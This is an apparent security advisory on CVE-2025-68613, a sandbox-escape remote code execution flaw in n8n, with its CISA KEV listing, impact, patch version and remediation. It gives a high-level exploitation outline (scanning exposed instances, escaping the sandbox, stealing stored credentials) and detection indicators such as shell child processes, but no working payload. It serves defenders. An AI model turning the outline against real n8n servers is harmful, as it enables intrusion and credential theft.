Executive Summary
CVE-2025-68613 is a critical remote code execution vulnerability in n8n, the widely-deployed open-source workflow automation platform. The flaw exists in n8n's expression evaluation engine and stems from improper control of dynamically-managed code resources — allowing an attacker to escape the expression sandbox and execute arbitrary system commands on the n8n server.
CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on March 11, 2026, confirming active exploitation in the wild. Federal civilian agencies under CISA's mandate have until April 1, 2026 to remediate.
With over 24,700 n8n instances discoverable on the internet, the attack surface is substantial. Organizations using n8n for security automation, DevOps pipelines, and IT workflows are at high risk.
Minimum safe version: n8n 1.88.0
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-68613 |
| CVSS Score | 9.9 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-913 — Improper Control of Dynamically-Managed Code Resources |
| Vendor | n8n GmbH |
| Product | n8n workflow automation platform |
| Affected Versions | n8n < 1.88.0 |
| Patch Version | n8n 1.88.0 |
| CISA KEV Added | March 11, 2026 |
| CISA Remediation Date | April 1, 2026 |
| Exploitation Status | Actively exploited in the wild |
Technical Analysis
Root Cause
n8n's expression evaluation system allows users to embed dynamic expressions within workflow nodes using {{ }} syntax. Internally, these expressions are executed via a JavaScript-based sandbox intended to restrict access to the host system.
The vulnerability arises from insufficient isolation of the expression evaluator: certain expression patterns can reference or construct JavaScript objects that escape the intended sandbox boundary, gaining access to Node.js runtime primitives. Once outside the sandbox, an attacker can invoke child_process.exec() or equivalent mechanisms to execute arbitrary operating system commands with the privileges of the n8n process.
Attack Surface
n8n is particularly high-value as a target because:
- Webhook endpoints are often publicly exposed — many n8n deployments expose webhook triggers directly to the internet
- n8n stores credentials for connected services — API keys, database credentials, cloud tokens, Slack/GitHub integrations
- n8n processes frequently run with elevated privileges — to interact with infrastructure, Docker, or internal systems
- SOAR and security automation workflows give n8n access to SIEM, ticketing, and response tooling
Exploitation Scenario
1. Attacker identifies an n8n instance (Shodan/FOFA — 24,700+ exposed)
2. Attacker crafts a payload targeting the expression evaluator
3. Payload escapes the sandbox via dynamically-managed code resource abuse
4. Arbitrary commands execute as the n8n process user
5. Attacker extracts credentials from n8n's credential store
6. Lateral movement to connected cloud/infrastructure targetsWhy 24,700 Instances?
Shodan and similar internet scanning platforms show over 24,700 n8n instances publicly reachable as of mid-March 2026. Many are self-hosted deployments by individuals, small teams, and enterprises — often without authentication or behind only basic HTTP auth. The combination of a CVSS 9.9 RCE and this exposure level makes mass exploitation trivially achievable for motivated threat actors.
Impact Assessment
| Area | Risk |
|---|---|
| Remote Code Execution | Full command execution on the n8n host with process-level privileges |
| Credential Theft | All credentials stored in n8n's credential manager are at risk |
| Lateral Movement | n8n's integrations provide pivot points to cloud, SaaS, and internal systems |
| Data Exfiltration | Workflow data, API responses, and processed payloads accessible |
| Supply Chain Impact | Compromised n8n in CI/CD pipelines enables downstream attacks |
| SOAR Compromise | n8n-based security automation can be subverted or disabled |
Remediation
Immediate Actions
- Update to n8n 1.88.0 or later — this is the patched version that remediates CVE-2025-68613
- Identify exposed instances — audit all n8n deployments for internet-facing exposure
- Rotate all stored credentials — if running a vulnerable version, all credentials in n8n's store should be considered compromised
- Review recent workflow execution logs — look for unusual expressions or unexpected child process activity
Network Controls
- Place n8n behind a VPN or zero-trust proxy — remove all direct internet exposure
- Restrict webhook access to known IP ranges or authenticated endpoints only
- Block outbound connections from n8n to unexpected destinations (egress filtering)
- Deploy a WAF in front of any externally-accessible n8n instance
Detection Guidance
Monitor for:
- Unusual process spawning from the n8n process (e.g.,
bash,sh,cmd.exeas child processes) - Outbound connections from n8n to external IPs outside normal integration targets
- File system access patterns outside standard n8n operation directories
- Credential access events in connected systems (AWS, GitHub, Slack) from unexpected sources
- New webhook trigger activations not matching established workflows
For Federal Agencies (CISA BOD 22-01)
Federal civilian agencies under the CISA Known Exploited Vulnerabilities directive must remediate by April 1, 2026. This covers any n8n installation in scope of the BOD, including self-hosted instances in agency cloud environments.
CISA KEV Entry
CISA added CVE-2025-68613 to the KEV catalog on March 11, 2026 under the following entry:
| Field | Value |
|---|---|
| Vendor/Project | n8n |
| Product | n8n |
| Vulnerability Name | n8n Improper Control of Dynamically-Managed Code Resources Vulnerability |
| Date Added | 2026-03-11 |
| Due Date | 2026-04-01 |
| Required Action | Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable |
| Known Ransomware Use | Unknown |
References
- CISA KEV — CVE-2025-68613
- NVD — CVE-2025-68613
- The Hacker News — CISA Flags Actively Exploited n8n RCE Bug
- BleepingComputer — CISA Orders Feds to Patch n8n RCE Flaw Exploited in Attacks